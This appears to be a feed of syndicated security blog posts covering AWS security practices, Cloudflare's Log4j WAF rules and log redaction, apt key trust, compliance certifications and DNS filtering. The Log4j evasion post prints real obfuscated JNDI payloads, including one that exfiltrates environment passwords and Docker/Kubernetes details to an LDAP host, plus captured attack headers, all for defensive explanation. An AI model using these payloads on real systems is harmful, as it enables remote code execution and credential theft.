Threat modeling is most effective when it’s done at the workload (or workload feature) level. We recommend creating reusable threat modeling templates. This will help ensure quicker time to production and a consistent security control posture for your systems.

Create feedback cycles

Security, like other areas of architecture and design, is not static. You don’t implement security processes and walk away, just like you wouldn’t ship an application and never improve its availability, performance, or ease of operation.

Implementation of feedback cycles will vary depending on your organizational structure and processes. However, one common way we have seen feedback cycles being implemented is with a collaborative, blame-free root cause analysis (RCA) process. It allows you to understand how many issues you have been able to prevent or effectively respond to and apply that knowledge to make your systems more secure. It also demonstrates organizational support for an objective discussion where people are not penalized for asking questions.

Security controls

Protect your applications and infrastructure

To secure your organization, build automation that delivers robust answers to the following questions:

  1. Preventative controls – how well can you block unauthorized access?
  2. Detective controls – how well can you identify unexpected activity or unwanted configuration?
  3. Incident response – how quickly and effectively can you respond and recover from issues?
  4. Data protection – how well is the data protected while being used and stored?

Preventative controls

Start with robust identity and access management (IAM). For human access, avoid having to maintain separate credentials between cloud and on-premises systems. It does not scale and creates threat vectors such as long-lived credentials and credential leaks.

Instead, use federated authentication within a centralized system for provisioning and deprovisioning organization-wide access to all your systems, including the cloud. For AWS access, you can do this with AWS Single Sign-On (AWS SSO), direct federation to IAM, or integration with partner solutions, such as Okta or Active Directory.

Enhance your trust boundary with the principles of “zero trust.” Traditionally, organizations tend to rely on the network as the primary point of control. This can create a “hard shell, soft core” model, which doesn’t consider context for access decisions. Zero trust is about increasing your use of identity as a means to grant access, in addition to traditional controls that rely on the network being private.

Apply “defense in depth” to your application infrastructure with a layered security architecture. The sequence in which you layer the controls together can depend on your use case. For example, you can apply IAM controls either at the database layer or at the start of user activity—or both. Figure 2 shows a conceptual view of layering controls to help secure access to your data. Figure 3 shows the implementation view for a web-facing application.


Figure 2. Defense in depth


Figure 3. Defense in depth applied to a web application

Detective controls

Detective controls allow you to get the information you need to respond to unexpected changes and incidents. Tools like Amazon GuardDuty and AWS Config can integrate with your security information and event management (SIEM) system so you can respond to incidents using human and automated intervention.

Incident response

When security incidents are detected, timely and appropriate response is critical to minimize business impact. A robust incident response process is a combination of human intervention steps and automation. The AWS Security Hub Automated Response and Remediation solution provides an example of how you can build incident response automation.

Protect data with robust controls

Restrict access to your databases with private networking and strong identity and access control. Apply data encryption in transit (TLS) and at rest. A common mistake that organizations make is not enabling encryption at rest in databases at the time of initial deployment.

It is difficult to enable database encryption after the fact without time-consuming data migration. Therefore, enable database encryption from the start and minimize direct human access to data by applying principles of least privilege. This reduces the likelihood of accidental disclosure of information or misconfiguration of systems.
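As a concrete example, the sketch below requests encryption when the database instance is created, because it cannot simply be switched on in place afterwards. The identifiers, engine, and sizes are placeholders, and the master password is supplied out of band rather than hard-coded.

import os

import boto3

rds = boto3.client("rds", region_name="us-east-1")

# Placeholder identifiers and sizes; the point is that StorageEncrypted is set at creation time.
rds.create_db_instance(
    DBInstanceIdentifier="orders-db",
    Engine="postgres",
    DBInstanceClass="db.t3.medium",
    AllocatedStorage=100,
    MasterUsername="dbadmin",
    MasterUserPassword=os.environ["DB_MASTER_PASSWORD"],  # supplied out of band, never hard-coded
    StorageEncrypted=True,        # cannot be enabled in place after the instance exists
    PubliclyAccessible=False,     # keep the database on private networking
)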

Ready to get started?

As a CTO, understanding the overall posture of your security processes against the foundational security controls is beneficial. The CTO and CISO organizations should regularly track key metrics on the effectiveness of the decision-making process, progress against overall security objectives, and the improvement in posture over time.

Embedding the principles of robust security processes and controls into the way your organization designs, develops, and operates workloads makes it easier to consistently make good decisions quickly.

To get started, look at workloads where engineering and security are already working together, or bootstrap an initiative for this. Use the Well-Architected Tool’s Security Pillar to create and communicate a set of objectives that demonstrate value.

Other blogs in this series

Looking for more architecture content? AWS Architecture Center provides reference architecture diagrams, vetted architecture solutions, Well-Architected best practices, patterns, icons, and more!

Protection against CVE-2021-45046, the additional Log4j RCE vulnerability

Post Syndicated from Gabriel Gabor original https://blog.cloudflare.com/protection-against-cve-2021-45046-the-additional-log4j-rce-vulnerability/

Protection against CVE-2021-45046, the additional Log4j RCE vulnerability


Hot on the heels of CVE-2021-44228, a second Log4J CVE has been filed: CVE-2021-45046. The rules that we previously released for CVE-2021-44228 give the same level of protection for this new CVE.

This vulnerability is actively being exploited and anyone using Log4J should update to version 2.16.0 as soon as possible, even if you have previously updated to 2.15.0. The latest version can be found on the Log4J download page.

Customers using the Cloudflare WAF have three rules to help mitigate any exploit attempts:

Rule ID | Description | Default Action
100514 (legacy WAF) / 6b1cc72dff9746469d4695a474430f12 (new WAF) | Log4J Headers | BLOCK
100515 (legacy WAF) / 0c054d4e4dd5455c9ff8f01efe5abb10 (new WAF) | Log4J Body | BLOCK
100516 (legacy WAF) / 5f6744fa026a4638bda5b3d7d5e015dd (new WAF) | Log4J URL | BLOCK

The mitigation has been split across three rules inspecting HTTP headers, body and URL respectively.

In addition to the above rules we have also released a fourth rule that will protect against a much wider range of attacks at the cost of a higher false positive rate. For that reason we have made it available but not set it to BLOCK by default:

Rule ID | Description | Default Action
100517 (legacy WAF) / 2c5413e155db4365befe0df160ba67d7 (new WAF) | Log4J Advanced URI, Headers | DISABLED

Who is affected

Log4J is a powerful Java-based logging library maintained by the Apache Software Foundation.

In all Log4J versions >= 2.0-beta9 and <= 2.14.1 JNDI features used in configuration, log messages, and parameters can be exploited by an attacker to perform remote code execution. Specifically, an attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

In addition, the previous mitigations for CVE-2021-44228, as seen in version 2.15.0, were not adequate to protect against CVE-2021-45046.

An exposed apt signing key and how to improve apt security

Post Syndicated from Jeff Hiner original https://blog.cloudflare.com/dont-use-apt-key/

An exposed apt signing key and how to improve apt security


Recently, we received a bug bounty report regarding the GPG signing key used for pkg.cloudflareclient.com, the Linux package repository for our Cloudflare WARP products. The report stated that this private key had been exposed. We’ve since rotated this key and we are taking steps to ensure a similar problem can’t happen again. Before you read on, if you are a Linux user of Cloudflare WARP, please follow these instructions to rotate the Cloudflare GPG Public Key trusted by your package manager. This only affects WARP users who have installed WARP on Linux. It does not affect Cloudflare customers of any of our other products or WARP users on mobile devices.

But we also realized that the impact of an improperly secured private key can have consequences that extend beyond the scope of one third-party repository. The remainder of this blog shows how to improve the security of apt with third-party repositories.

The unexpected impact

At first, we thought that the exposed signing key could only be used by an attacker to forge packages distributed through our package repository. However, when reviewing impact for Debian and Ubuntu platforms we found that our instructions were outdated and insecure. In fact, we found the majority of Debian package repositories on the Internet were providing the same poor guidance: download the GPG key from a website and then either pipe it directly into apt-key or copy it into /etc/apt/trusted.gpg.d/. This method adds the key as a trusted root for software installation from any source. To see why this is a problem, we have to understand how apt downloads and verifies software packages.

How apt verifies packages

In the early days of Linux, package maintainers wanted to make sure users could trust that the software being installed on their machines came from a trusted source.

Apt has a list of places to pull packages from (sources) and a method to validate those sources (trusted public keys). Historically, the keys were stored in a single keyring file: /etc/apt/trusted.gpg. Later, as third party repositories became more common, apt could also look inside /etc/apt/trusted.gpg.d/ for individual key files.

What happens when you run apt update? First, apt fetches a signed file called InRelease from each source. Some servers supply separate Release and signature files instead, but they serve the same purpose. InRelease is a file containing metadata that can be used to cryptographically validate every package in the repository. Critically, it is also signed by the repository owner’s private key. As part of the update process, apt verifies that the InRelease file has a valid signature, and that the signature was generated by a trusted root. If everything checks out, a local package cache is updated with the repository’s contents. This cache is directly used when installing packages. The chain of signed InRelease files and cryptographic hashes ensures that each downloaded package hasn’t been corrupted or tampered with along the way.

[Diagram: apt update fetching the signed InRelease file and verifying it against a trusted key before updating the package cache]

A typical third-party repository today

For most Ubuntu/Debian users today, this is what adding a third-party repository looks like in practice:

  1. Add a file in /etc/apt/sources.list.d/ telling apt where to look for packages.
  2. Add the gpg public key to /etc/apt/trusted.gpg.d/, probably via apt-key.

If apt-key is used in the second step, the command typically pops up a deprecation warning, telling you not to use apt-key. There’s a good reason: adding a key like this trusts it for any repository, not just the source from step one. This means if the private key associated with this new source is compromised, attackers can use it to bypass apt’s signature verification and install their own packages.

What would this type of attack look like? Assume you’ve got a stock Debian setup with a default sources list[1]:

deb http://deb.debian.org/debian/ bullseye main non-free contrib
deb http://security.debian.org/debian-security bullseye-security main contrib non-free

At some point you installed a trusted key that was later exposed, and the attacker has the private key. This key was added alongside a source pointing at https, assuming that even if the key is broken an attacker would have to break TLS encryption as well to install software via that route.

You’re enjoying a hot drink at your local cafe, where someone nefarious has managed to hack the router without your knowledge. They’re able to intercept http traffic and modify it. An auto-update script on your laptop runs apt update. The attacker pretends to be deb.debian.org, and because at least one source is configured to use http, the attacker doesn’t need to break https. They return a modified InRelease file signed with the compromised key, indicating that a newer update of the bash package is available. apt pulls the new package (again from the attacker) and installs it, as root. Now you’ve got a big problem[2].

A better way

It seems the way most folks are told to set up third-party Debian repositories is wrong. What if you could tell apt to only trust that GPG key for a specific source? That, combined with the use of https, would significantly reduce the impact of a key compromise. As it turns out, there’s a way to do that! You’ll need to do two things:

  1. Make sure the key isn’t in /etc/apt/trusted.gpg or /etc/apt/trusted.gpg.d/ anymore. If the key is its own file, the easiest way to do this is to move it to /usr/share/keyrings/. Make sure the file is owned by root, and only root can write to it. This step is important, because it prevents apt from using this key to check all repositories in the sources list.
  2. Modify the sources file in /etc/apt/sources.list.d/ telling apt that this particular repository can be “signed by” a specific key. When you’re done, the line should look like this:

deb [signed-by=/usr/share/keyrings/cloudflare-client.gpg] https://pkg.cloudflareclient.com/ bullseye main

Some source lists contain other metadata indicating that the source is only valid for certain architectures. If that’s the case, just add a space in the middle, like so:

deb [amd64 signed-by=/usr/share/keyrings/cloudflare-client.gpg] https://pkg.cloudflareclient.com/ bullseye main

We’ve updated the instructions on our own repositories for the WARP Client and Cloudflare with this information, and we hope others will follow suit.

If you run apt-key list on your own machine, you’ll probably find several keys that are trusted far more than they should be. Now you know how to fix them!

For those running your own repository, now is a great time to review your installation instructions. If your instructions tell users to curl a public key file and pipe it straight into sudo apt-key, maybe there’s a safer way. While you’re in there, ensuring the package repository supports https is a great way to add an extra layer of security (and if you host your traffic via Cloudflare, it’s easy to set up, and free. You can follow this blog post to learn how to properly configure Cloudflare to cache Debian packages).


[1] RPM-based distros like Fedora, CentOS, and RHEL also use a common trusted GPG store to validate packages, but since they generally use https by default to fetch updates they aren’t vulnerable to this particular attack.
[2] The attack described above requires an active on-path network attacker. If you are using the WARP client or Cloudflare for Teams to tunnel your traffic to Cloudflare, your network traffic cannot be tampered with on local networks.

Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration

Post Syndicated from John Graham-Cumming original https://blog.cloudflare.com/exploitation-of-cve-2021-44228-before-public-disclosure-and-evolution-of-waf-evasion-patterns/

Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration

In this blog post we will cover WAF evasion patterns and exfiltration attempts seen in the wild, trend data on attempted exploitation, and information on exploitation that we saw prior to the public disclosure of CVE-2021-44228.

In short, we saw limited testing of the vulnerability on December 1, eight days before public disclosure. We saw the first attempt to exploit the vulnerability just nine minutes after public disclosure, showing just how fast attackers exploit newly found problems.

We also see mass attempts to evade WAFs that have tried to perform simple blocking, and mass attempts to exfiltrate data, including secret credentials and passwords.

WAF Evasion Patterns and Exfiltration Examples

Since the disclosure of CVE-2021-44228 (now commonly referred to as Log4Shell) we have seen attackers go from using simple attack strings to actively trying to evade blocking by WAFs. WAFs provide a useful tool for stopping external attackers and WAF evasion is commonly attempted to get past simplistic rules.

In the earliest stages of exploitation of the Log4j vulnerability, attackers used un-obfuscated strings typically starting with ${jndi:dns, ${jndi:rmi, and ${jndi:ldap, and simple rules that looked for those patterns were effective.

Those strings were quickly blocked, and attackers switched to using evasion techniques. They used, and are using, both standard evasion techniques (escaping or encoding of characters) and tailored evasion specific to the Log4j Lookups language.

Any capable WAF will be able to handle the standard techniques. Tricks like encoding ${ as %24%7B or \u0024\u007b are easily reversed before applying rules to check for the specific exploit being used.
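As a toy illustration (this is not any vendor’s actual WAF logic), a normalizer might undo URL- and Unicode-escaping a few times before looking for the suspicious token:

import codecs
import re
from urllib.parse import unquote

def normalize(value: str, passes: int = 3) -> str:
    # Undo common encodings a few times so %24%7B or \u0024\u007b become ${.
    for _ in range(passes):
        value = unquote(value)                          # %24%7B -> ${
        value = codecs.decode(value, "unicode_escape")  # \u0024\u007b -> ${
    return value

def looks_like_log4j_probe(value: str) -> bool:
    return re.search(r"\$\{.*jndi", normalize(value), re.IGNORECASE) is not None

print(looks_like_log4j_probe("%24%7Bjndi:ldap://attacker.example/a%7D"))        # True
print(looks_like_log4j_probe("\\u0024\\u007bjndi:ldap://attacker.example/a}"))  # True

A production WAF decodes many more encodings and applies them repeatedly before matching, but the principle is the same.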

However, the Log4j language has some rich functionality that enables obscuring the key strings that some WAFs look for. For example, the ${lower} lookup will lowercase a string, so ${lower:H} would turn into h. Using lookups, attackers disguise critical strings like jndi, helping them evade WAFs.

In the wild we are seeing use of ${date}, ${lower}, ${upper}, ${web}, ${main} and ${env} for evasion. Additionally, ${env}, ${sys} and ${main} (and other specialized lookups for Docker, Kubernetes and other systems) are being used to exfiltrate data from the target process’ environment (including critical secrets).

To better understand how this language is being used, here is a small Java program that takes a string on the command-line and logs it to the console via Log4j:

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class log4jTester{
    private static final Logger logger = LogManager.getLogger(log4jTester.class);
       
    public static void main(String[] args) {
	logger.error(args[0]);
    }
}

This simple program writes to the console. Here it is logging the single word hide.

$ java log4jTester.java 'hide'          
01:28:25.606 [main] ERROR log4jTester - hide

The Log4j language allows ${} expressions to be nested inside other ${} expressions, so attackers can combine multiple keywords for evasion. For example, the following ${lower:${lower:h}}${lower:${upper:i}}${lower:D}e would be logged as the word hide. That makes it easy for an attacker to evade simplistic searching for ${jndi, for example, as the letters of jndi can be hidden in a similar manner.

$ java log4jTester.java '${lower:${lower:h}}${lower:${upper:i}}${lower:d}e'
01:30:42.015 [main] ERROR log4jTester - hide

The other major evasion technique makes use of the :- syntax. That syntax enables the attacker to set a default value for a lookup, and if the value looked up is empty, the default value is output. So, for example, looking up a non-existent environment variable can be used to output the letters of a word.

$ java log4jTester.java '${env:NOTEXIST:-h}i${env:NOTEXIST:-d}${env:NOTEXIST:-e}' 
01:35:34.280 [main] ERROR log4jTester - hide

Similar techniques are in use with ${web}, ${main}, and so on, as well as strings like ${::-h} or ${::::::-h}, which both turn into h. And, of course, combinations of these techniques are being put together to make more and more elaborate evasion attempts.
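To see why naive substring matching fails, here is a deliberately simplified toy resolver in Python (it is not Log4j, and it models only the lower, upper, env, and default-value behaviors described above) that evaluates a payload roughly the way Log4j lookups would:

import os
import re

TOKEN = re.compile(r"\$\{([^${}]*)\}")  # innermost ${...} with no nested braces

def resolve(text: str) -> str:
    # Toy model of Log4j lookup evaluation: lower/upper, env lookups, and :- defaults.
    while True:
        match = TOKEN.search(text)
        if not match:
            return text
        body = match.group(1)
        if body.startswith("jndi:"):
            return f"[would trigger JNDI lookup: {body}]"
        if body.startswith("lower:"):
            value = body[len("lower:"):].lower()
        elif body.startswith("upper:"):
            value = body[len("upper:"):].upper()
        elif body.startswith("env:"):
            name, _, default = body[len("env:"):].partition(":-")
            value = os.environ.get(name, default)
        elif ":-" in body:
            value = body.split(":-", 1)[1]  # e.g. ${::-h} -> h
        else:
            value = ""
        text = text[:match.start()] + value + text[match.end():]

print(resolve("${lower:${lower:h}}${lower:${upper:i}}${lower:d}e"))        # hide
print(resolve("${env:NOTEXIST:-h}i${env:NOTEXIST:-d}${env:NOTEXIST:-e}"))  # hide
print(resolve("${${::-j}${::-n}${::-d}${::-i}:ldap://x.example/a}"))       # reveals the hidden jndi lookup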

To get a sense for how evasion has taken off, here’s a chart showing un-obfuscated ${jndi: appearing in WAF blocks (orange line), use of the ${lower} lookup (green line), use of URI encoding (blue line), and one particular evasion that’s become popular, ${${::-j}${::-n}${::-d}${::-i} (red line).

[Chart: growth of evasion patterns appearing in WAF blocks over time]

For the first couple of days, evasion was relatively rare. Now, however, although naive strings like ${jndi: remain popular, evasion has taken off and WAFs must block these improved attacks.

We wrote last week about the initial phases of exploitation that were mostly about reconnaissance. Since then attackers have moved on to data extraction.

We see the use of ${env} to extract environment variables, and ${sys} to get information about the system on which Log4j is running. One attack, blocked in the wild, attempted to exfiltrate a lot of data from various Log4j lookups:

${${env:FOO:-j}ndi:${lower:L}da${lower:P}://x.x.x.x:1389/FUZZ.HEADER.${docker:
imageName}.${sys:user.home}.${sys:user.name}.${sys:java.vm.version}.${k8s:cont
ainerName}.${spring:spring.application.name}.${env:HOSTNAME}.${env:HOST}.${ctx
:loginId}.${ctx:hostName}.${env:PASSWORD}.${env:MYSQL_PASSWORD}.${env:POSTGRES
_PASSWORD}.${main:0}.${main:1}.${main:2}.${main:3}}

There you can see the user, home directory, Docker image name, details of Kubernetes and Spring, passwords for the user and databases, hostnames and command-line arguments being exfiltrated.

Because of the sophistication of both evasion and exfiltration, WAF vendors need to be looking at any occurrence of ${ and treating it as suspicious. For this reason, we are additionally offering to sanitize any logs we send our customers, converting ${ to x{.

The Cloudflare WAF team is continuously working to block attempted exploitation, but it is still vital that customers patch their systems with an up-to-date Log4j or apply mitigations. Since data that is logged does not necessarily come via the Internet, systems need patching whether they are Internet-facing or not.

All paid customers have configurable WAF rules to help protect against CVE-2021-44228, and we have also deployed protection for our free customers.

Cloudflare quickly put in place WAF rules to help block these attacks. The following chart shows how those blocked attacks evolved.

[Chart: blocked exploitation attempts over time]

From December 10 to December 13 we saw the number of blocks per minute ramp up as follows.

Date | Mean blocked requests per minute
2021-12-10 | 5,483
2021-12-11 | 18,606
2021-12-12 | 27,439
2021-12-13 | 24,642

In our initial blog post we noted that Canada (the green line below) was the top source country for attempted exploitation. As we predicted, that did not continue, and attacks are now coming from all over the world, either directly from servers or via proxies.

[Chart: top source countries for attempted exploitation over time]

Exploitation of CVE-2021-44228 prior to disclosure

CVE-2021-44228 was disclosed in a (now deleted) Tweet on 2021-12-09 14:25 UTC:

[Screenshot of the now-deleted Tweet disclosing CVE-2021-44228]

However, our systems captured three instances of attempted exploitation or scanning on December 1, 2021 as follows. In each of these I have obfuscated IP addresses and domain names. These three injected ${jndi:ldap} lookups in the HTTP User-Agent header, the Referer header and in URI parameters.

2021-12-01 03:58:34
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
    (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 ${jndi:ldap://rb3w24.example.com/x}
Referer: /${jndi:ldap://rb3w24.example.com/x}
Path: /$%7Bjndi:ldap://rb3w24.example.com/x%7D

2021-12-01 04:36:50
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
    (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 ${jndi:ldap://y3s7xb.example.com/x}
Referer: /${jndi:ldap://y3s7xb.example.com/x}
Parameters: x=$%7Bjndi:ldap://y3s7xb.example.com/x%7D						

2021-12-01 04:20:30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
    (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 ${jndi:ldap://vf9wws.example.com/x}
Referer: /${jndi:ldap://vf9wws.example.com/x}	
Parameters: x=$%7Bjndi:ldap://vf9wws.example.com/x%7D	

After those three attempts we saw no further activity until nine minutes after public disclosure, when someone attempted to inject a ${jndi:ldap} string via a URI parameter on a gaming website.

2021-12-09 14:34:31
Parameters: redirectUrl=aaaaaaa$aadsdasad$${jndi:ldap://log4.cj.d.example.com/exp}

Conclusion

CVE-2021-44228 is being actively exploited by a large number of actors. WAFs are effective as a measure to help prevent attacks from the outside, but they are not foolproof, and attackers are actively working on evasions. The potential for exfiltration of data and credentials is incredibly high, and the long-term risk of more devastating hacks and attacks is very real.

It is vital to mitigate and patch affected software that uses Log4j now and not wait.

Sanitizing Cloudflare Logs to protect customers from the Log4j vulnerability

Post Syndicated from Jon Levine original https://blog.cloudflare.com/log4j-cloudflare-logs-mitigation/

Sanitizing Cloudflare Logs to protect customers from the Log4j vulnerability

On December 9, 2021, the world learned about CVE-2021-44228, a zero-day exploit affecting the Apache Log4j utility.  Cloudflare immediately updated our WAF to help protect against this vulnerability, but we recommend customers update their systems as quickly as possible.

However, we know that many Cloudflare customers consume their logs using software that uses Log4j, so we are also mitigating any exploits attempted via Cloudflare Logs. As of this writing, we are seeing the exploit pattern in logs we send to customers up to 1000 times every second.

Starting immediately, customers can update their Logpush jobs to automatically redact tokens that could trigger this vulnerability. You can read more about this in our developer docs or see details below.

How the attack works

You can read more about how the Log4j vulnerability works in our blog post here. In short, an attacker can add something like ${jndi:ldap://example.com/a} in any string. Log4j will then make a connection on the Internet to retrieve this object.

Cloudflare Logs contain many string fields that are controlled by end-users on the public Internet, such as User Agent and URL path. With this vulnerability, it is possible that a malicious user can cause a remote code execution on any system that reads these fields and uses an unpatched instance of Log4j.

Our mitigation plan

Unfortunately, just checking for a token like ${jndi:ldap is not sufficient to protect against this vulnerability. Because of the expressiveness of the templating language, it’s necessary to check for obfuscated variants as well. Already, we are seeing attackers in the wild use variations like ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}.  Thus, redacting the token ${ is the most general way to defend against this vulnerability.

The token ${ appears up to 1,000 times per second in the logs we currently send to customers. A spot check of some records shows that many of them are not attempts to exploit this vulnerability. Therefore we can’t safely redact our logs without impacting customers who may expect to see this token in their logs.

Starting now, customers can update their Logpush jobs to redact the string ${ and replace it with x{ everywhere.
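As a rough illustration of the effect of that setting (this is not Cloudflare’s implementation, just the substitution it describes applied to a few example log fields, whose names here are illustrative):

import json

def redact_log4j_tokens(record: dict) -> dict:
    # Replace the sequence '${' with 'x{' in every string field of a log record.
    return {
        key: value.replace("${", "x{") if isinstance(value, str) else value
        for key, value in record.items()
    }

record = {
    "ClientRequestUserAgent": "Mozilla/5.0 ${jndi:ldap://attacker.example/a}",
    "ClientRequestURI": "/search?q=${${::-j}ndi:ldap://attacker.example/a}",
    "EdgeResponseStatus": 200,
}
print(json.dumps(redact_log4j_tokens(record), indent=2))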

To enable this, customers can update their Logpush job options configuration to include the parameter CVE-2021-44228=true. For detailed instructions on how to do this using the Logpush API, see our developer documentation.

Zabbix NOT AFFECTED by the Log4j exploit

Post Syndicated from Arturs Lontons original https://blog.zabbix.com/zabbix-not-affected-by-the-log4j-exploit/17873/

A newly revealed vulnerability impacting Apache Log4j 2 versions 2.0 to 2.14.1 was disclosed on GitHub on 9 December 2021 and registered as CVE-2021-44228 with the highest severity rating. Log4j is an open-source, Java-based logging utility widely used by enterprise applications and cloud services. By utilizing this vulnerability, a remote attacker could take control of the affected system.

Zabbix is aware of this vulnerability, has completed verification, and can conclude that the only product where we use Java is Zabbix Java Gateway, which does not utilize the log4j library and is therefore not impacted by this vulnerability.

For customers who use the log4j library with other Java applications, here are some proactive measures they can take to reduce the risk posed by CVE-2021-44228:

  • Upgrade to Apache Log4j 2.16.0 or later, as all prior 2.x versions are vulnerable.
  • For Log4j version 2.10.0 or later, block JNDI from making requests to untrusted servers by setting the configuration value log4j2.formatMsgNoLookups to “TRUE” to prevent LDAP and other queries.
  • Ensure that both com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase are set to “FALSE” (the default since Java 8u121) to help prevent Remote Code Execution attacks via remote codebases.
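
To help identify affected applications, here is a minimal sketch of a script that locates Log4j 2.x jars on disk by reading the pom.properties file bundled inside log4j-core (paths are illustrative; shaded or nested jars may need additional handling):

    import sys, zipfile
    from pathlib import Path

    POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

    def log4j_core_version(jar_path):
        """Return the log4j-core version bundled in a jar, or None if absent."""
        try:
            with zipfile.ZipFile(jar_path) as jar, jar.open(POM) as props:
                for line in props.read().decode("utf-8", "replace").splitlines():
                    if line.startswith("version="):
                        return line.split("=", 1)[1].strip()
        except (KeyError, zipfile.BadZipFile, OSError):
            return None

    root = Path(sys.argv[1] if len(sys.argv) > 1 else ".")
    for jar in root.rglob("*.jar"):
        version = log4j_core_version(jar)
        if version and version.startswith("2."):
            print(f"{jar}: log4j-core {version}")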

Updates to Cloudflare Security and Privacy Certifications and Reports

Post Syndicated from Ling Wu original https://blog.cloudflare.com/updates-to-cloudflare-security-and-privacy-certifications-and-reports/

Cloudflare’s products and services are protecting more customers than ever with significant expansion over the past year. Earlier this week, we launched Cloudflare Security Center so customers can map their attack surface and review potential security risks and threats to their organization, and we have generally fast-tracked many offerings to meet the needs of customers.

This rapid expansion has meant ensuring our security, privacy, and risk posture grew accordingly. Customer confidence in our ability to handle their sensitive information in an ever-changing regulatory landscape has to be as solid as our offerings, so we have expanded the scope of our existing compliance validations and obtained a couple of new ones.

What’s New

We’ve had a busy year and focused on our commitment to privacy as well as complying with one of the most rigorous security standards in the industry. We are excited about the following achievements in 2021:

FedRAMP In Process – Cloudflare hit a major milestone by being listed on the FedRAMP Marketplace as ‘In Process’ for receiving an agency authorization at a moderate baseline. Once an Authorization to Operate (ATO) is granted, it will allow agencies and other cloud service providers to leverage our product and services in a public sector capacity.

ISO 27701:2019 (International Organization for Standardization) – Cloudflare is one of the first companies in the industry to achieve ISO 27701 certification as both a data processor and controller. The certification provides assurance to our customers that we have a formal privacy program that is aligned with the GDPR.

Self-Serve Compliance Documentation – Pro, Business, and Enterprise customers now have the ability to obtain a copy of Cloudflare’s certifications, reports, and overview through the Cloudflare Dashboard.

Security Certifications & Reports

Cloudflare understands the importance of maintaining compliance to industry standards, certifications, and reports. Our customers rely on the certifications we have to ensure secure and private handling of their data. Each year, the security team expands the scope of these validations to ensure that all of our applicable products and services are included.  Cloudflare has met the requirements of the following standards:

SOC-2 Type II / SOC 3 (Service Organization Controls) – Cloudflare maintains SOC reports that include the security, confidentiality, and availability trust principles. The SOC-2 report provides assurance that our products and underlying infrastructure are secure and highly available while protecting the confidentiality of our customers’ data. We engage with our third-party assessors on an annual basis, and the report provided to our customers covers a period of one full year.

ISO 27001:2013 (International Organization for Standardization) – Cloudflare’s ISO certification covers our entire platform. Customers can be assured that Cloudflare has a formal information security management program that adheres to a globally recognized standard.

PCI Data Security Standard (DSS) – Cloudflare engages with a QSA (Qualified Security Assessor) on an annual basis to evaluate us as a Level 1 Merchant and a Service Provider. This way, we can assure our customers that we meet the requirements to transmit their payment data securely. As a service provider, our customers can trust Cloudflare’s products to meet requirements of the DSS and transmit cardholder data securely through our services.

HIPAA/HITECH Act (Health Insurance Portability and Accountability Act/Health Information Technology for Economic and Clinical Health Act) – Covered healthcare entities that are leveraging the enterprise version of our security products to protect their application layer can be assured that Cloudflare can sign Business Associate Agreements (BAAs).

1.1.1.1 Public DNS Resolver Privacy Examination – Cloudflare conducted a first-of-its-kind privacy examination by a leading accounting firm to determine whether the 1.1.1.1 resolver was effectively configured to meet Cloudflare’s privacy commitments. A public summary of the assessment can be found here.

What’s on our Roadmap?

As a global company, Cloudflare partners with industry experts and regional leaders around the world to determine the best ways to build customer trust. Our infoshare events with existing customers and participation in standards organizations guide our methods to continuously improve the security and privacy posture of our products and services. Part of that improvement is obtaining additional third party validations. At this time, we are evaluating ISO 27018 to give customers additional assurance that we meet industry standards for handling personal data in our cloud platform. We will continue to move forward in our FedRAMP journey. And of course, we are continuously evaluating a range of other region-specific certifications. For the latest information about our certifications and reports, please visit our trust hub.

If you are an existing customer and want to give us feedback about a validation, please contact your Account Executive and let them know! We will continue to pursue validations that support our customers’ needs and make the internet safer and more secure.

Secure how your servers connect to the Internet today

Post Syndicated from Sam Rhea original https://blog.cloudflare.com/secure-how-your-servers-connect-to-the-internet-today/

The vulnerability disclosed yesterday in the Java-based logging package, log4j, allows attackers to execute code on a remote server. We’ve updated Cloudflare’s WAF to defend your infrastructure against this 0-day attack. The attack also relies on exploiting servers that are allowed unfettered connectivity to the public Internet. To help solve that challenge, your team can deploy Cloudflare One today to filter and log how your infrastructure connects to any destination.

Securing traffic inbound and outbound

You can read about the vulnerability in more detail in our analysis published earlier today, but the attack starts when an attacker adds a specific string to input that the server logs. Today’s updates to Cloudflare’s WAF block that malicious string from being sent to your servers. We still strongly recommend that you patch your instances of log4j immediately to prevent lateral movement.

If the string has already been logged, the vulnerability compromises servers by tricking them into sending a request to a malicious LDAP server. The destination of the malicious server could be any arbitrary URL. Attackers who control that URL can then respond to the request with arbitrary code that the server can execute.

At the time of this blog, it does not appear any consistent patterns of malicious hostnames exist like those analyzed in the SUNBURST attack. However, any server or network with unrestricted connectivity to the public Internet is a risk for this specific vulnerability and others that rely on exploiting that open window.

First, filter and log DNS queries with two-clicks

From what we’re observing in early reports, the vulnerability mostly relies on connectivity to IP addresses. Cloudflare’s network firewall, the second step in this blog, focuses on that level of security. However, your team can adopt a defense-in-depth strategy by deploying Cloudflare’s protective DNS resolver today, adding DNS filtering, security, and visibility in minutes to any servers that need to communicate out to the Internet.

If you configure Cloudflare Gateway as the DNS resolver for those servers, any DNS query they make to find the IP address of a given host, malicious or not, will be sent to a nearby Cloudflare data center first. Cloudflare runs the world’s fastest DNS resolver so that you don’t have to compromise performance for this level of added safety and logging. When that query arrives, Cloudflare’s network can then:

  • filter your DNS queries to block the resolution of queries made to known malicious destinations, and
  • log every query if you need to investigate and audit after potential events.

Alternatively, if you know every host that your servers need to connect to, you can create a positive security model with Cloudflare Gateway. In this model, your resource can only send DNS queries to the domains that you provide. Queries to any other destinations, including new and arbitrary ones like those that could be part of this attack, will be blocked by default.
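
As a conceptual illustration of that positive security model (this is not how Gateway is implemented internally, just the idea of an allow-list resolver policy; the domains are placeholders):

    # Conceptual sketch: allow DNS resolution only for explicitly approved domains.
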